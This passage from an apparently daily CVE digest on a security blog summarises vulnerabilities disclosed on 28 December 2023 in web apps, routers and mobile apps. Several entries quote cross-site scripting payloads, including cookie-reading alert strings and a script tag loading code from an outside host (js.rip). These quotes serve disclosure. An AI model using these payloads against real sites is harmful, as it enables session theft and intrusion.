CVSS Score : 5.5

References :
https://github.com/h4md153v63n/CVEs/blob/main/Voting_System/Voting_System-SQL_Injection-2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249132 | source : cna@vuldb.com
https://vuldb.com/?id.249132 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7124

First published on : 28-12-2023 03:15:08
Last modified on : 28-12-2023 15:09:53

Description :
A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input <video/src=x onerror=alert(document.cookie)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096.

CVE ID : CVE-2023-7124
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/E-commerce_Site/E-commerce_Site-Reflected_Cross_Site_Scripting.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249096 | source : cna@vuldb.com
https://vuldb.com/?id.249096 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-7133

First published on : 28-12-2023 18:15:45
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability was found in y_project RuoYi 4.7.8. It has been declared as problematic. This vulnerability affects unknown code of the file /login of the component HTTP POST Request Handler. The manipulation of the argument rememberMe with the input falsen3f0m<script>alert(1)</script>p86o0 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249136.

CVE ID : CVE-2023-7133
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://1drv.ms/w/s!AgMfVZkPO1NWgSPnwk90DMQIUN_D?e=2Bauy4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.249136 | source : cna@vuldb.com
https://vuldb.com/?id.249136 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : hcl.com

Vulnerability ID : CVE-2023-45702

First published on : 28-12-2023 08:15:35
Last modified on : 28-12-2023 15:09:53

Description :
An HCL UrbanCode Deploy Agent installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts..

CVE ID : CVE-2023-45702
Source : psirt@hcl.com
CVSS Score : 6.2

References :
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0108646 | source : psirt@hcl.com


Vulnerability ID : CVE-2023-45701

First published on : 28-12-2023 07:15:07
Last modified on : 28-12-2023 15:09:53

Description :
HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.

CVE ID : CVE-2023-45701
Source : psirt@hcl.com
CVSS Score : 4.3

References :
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0108645 | source : psirt@hcl.com


Source : usom.gov.tr

Vulnerability ID : CVE-2023-4672

First published on : 28-12-2023 10:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Talent Software ECOP allows Reflected XSS.This issue affects ECOP: before 32255.

CVE ID : CVE-2023-4672
Source : iletisim@usom.gov.tr
CVSS Score : 6.1

References :
https://www.usom.gov.tr/bildirim/tr-23-0737 | source : iletisim@usom.gov.tr

Vulnerability : CWE-79


(3) LOW VULNERABILITIES [0.1, 3.9]

Source : vuldb.com

Vulnerability ID : CVE-2023-7132

First published on : 28-12-2023 17:15:09
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input "><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135.

CVE ID : CVE-2023-7132
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/h4md153v63n/CVEs/blob/main/Intern_Membership_Management_System/Intern_Membership_Management_System-Stored_Cross_site_Scripting.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249135 | source : cna@vuldb.com
https://vuldb.com/?id.249135 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-7135

First published on : 28-12-2023 21:15:07
Last modified on : 28-12-2023 21:15:07

Description :
A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-7135
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/h4md153v63n/CVEs/blob/main/Record_Management_System/Record_Management_System-Blind_Cross_Site_Scripting-1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249138 | source : cna@vuldb.com
https://vuldb.com/?id.249138 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-7136

First published on : 28-12-2023 21:15:08
Last modified on : 28-12-2023 21:15:08

Description :
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.

CVE ID : CVE-2023-7136
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/h4md153v63n/CVEs/blob/main/Record_Management_System/Record_Management_System-Blind_Cross_Site_Scripting-2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249139 | source : cna@vuldb.com
https://vuldb.com/?id.249139 | source : cna@vuldb.com

Vulnerability : CWE-79


(13) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : mitre.org

Vulnerability ID : CVE-2023-34829

First published on : 28-12-2023 03:15:07
Last modified on : 28-12-2023 15:09:53

Description :
Incorrect access control in TP-Link Tapo before v3.1.315 allows attackers to access user credentials in plaintext.

CVE ID : CVE-2023-34829
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/SecureScripts/TP-Link_Tapo_Hack | source : cve@mitre.org


Vulnerability ID : CVE-2023-49228

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue was discovered in Peplink Balance Two before 8.4.0. Console port authentication uses hard-coded credentials, which allows an attacker with physical access and sufficient knowledge to execute arbitrary commands as root.

CVE ID : CVE-2023-49228
Source : cve@mitre.org
CVSS Score : /

References :
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4 | source : cve@mitre.org
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf | source : cve@mitre.org


Vulnerability ID : CVE-2023-49229

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in the administration web service allows read-only, unprivileged users to obtain sensitive information about the device configuration.

CVE ID : CVE-2023-49229
Source : cve@mitre.org
CVSS Score : /

References :
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4 | source : cve@mitre.org
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf | source : cve@mitre.org


Vulnerability ID : CVE-2023-49230

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals' configurations without prior authentication.

CVE ID : CVE-2023-49230
Source : cve@mitre.org
CVSS Score : /

References :
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4 | source : cve@mitre.org
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf | source : cve@mitre.org


Vulnerability ID : CVE-2023-51006

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue in the openFile method of Chinese Perpetual Calendar v9.0.0 allows attackers to read any file via unspecified vectors.

CVE ID : CVE-2023-51006
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/firmianay/security-issues/tree/main/app/cn.etouch.ecalendar | source : cve@mitre.org


Vulnerability ID : CVE-2023-51010

First published on : 28-12-2023 04:15:08
Last modified on : 28-12-2023 15:09:53

Description :
An issue in the export component AdSdkH5Activity of com.sdjictec.qdmetro v4.2.2 allows attackers to open a crafted URL without any filtering or checking.

CVE ID : CVE-2023-51010
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/firmianay/security-issues/tree/main/app/com.sdjictec.qdmetro | source : cve@mitre.org


Vulnerability ID : CVE-2023-50445

First published on : 28-12-2023 05:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Shell Injection vulnerability GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7., allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module.

CVE ID : CVE-2023-50445
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-46989

First published on : 28-12-2023 06:15:44
Last modified on : 28-12-2023 15:09:53

Description :
SQL Injection vulnerability in the Innovadeluxe Quick Order module for PrestaShop before v.1.4.0, allows local attackers to execute arbitrary code via the getProducts() function in the productlist.php file.

CVE ID : CVE-2023-46989
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2023/12/12/idxquickorder.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-49469

First published on : 28-12-2023 06:15:44
Last modified on : 28-12-2023 15:09:53

Description :
Reflected Cross Site Scripting (XSS) vulnerability in Shaarli v0.12.2, allows remote attackers to execute arbitrary code via search tag function.

CVE ID : CVE-2023-49469
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/shaarli/Shaarli/issues/2038 | source : cve@mitre.org
https://github.com/shaarli/Shaarli/releases/tag/v0.13.0 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50692

First published on : 28-12-2023 06:15:44
Last modified on : 28-12-2023 15:09:53

Description :
File Upload vulnerability in JIZHICMS v.2.5, allows remote attacker to execute arbitrary code via a crafted file uploaded and downloaded to the download_url parameter in the app/admin/exts/ directory.

CVE ID : CVE-2023-50692
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/Cherry-toto/jizhicms/issues/91 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50038

First published on : 28-12-2023 07:15:08
Last modified on : 28-12-2023 15:09:53

Description :
There is an arbitrary file upload vulnerability in the background of textpattern cms v4.8.8, which leads to the loss of server permissions.

CVE ID : CVE-2023-50038
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/LeopoldSkell/7e18bf09005c327a045abbfe39b1e676 | source : cve@mitre.org
https://www.cnblogs.com/fengzun/articles/17862578.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-46987

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
SeaCMS v12.9 was discovered to contain a remote code execution (RCE) vulnerability via the component /augap/adminip.php.

CVE ID : CVE-2023-46987
Source : cve@mitre.org
CVSS Score : /

References :
http://seacms.com | source : cve@mitre.org
http://www.seacms.com/ | source : cve@mitre.org
https://blog.csdn.net/weixin_72610998/article/details/133420747?spm=1001.2014.3001.5501 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50470

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
A cross-site scripting (XSS) vulnerability in the component admin_ Video.php of SeaCMS v12.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

CVE ID : CVE-2023-50470
Source : cve@mitre.org
CVSS Score : /

References :
http://seacms.com | source : cve@mitre.org
https://blog.csdn.net/weixin_72610998/article/details/134784075?spm=1001.2014.3001.5502 | source : cve@mitre.org
https://www.seacms.net/ | source : cve@mitre.org


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports

Securitricks

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Securitricks.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.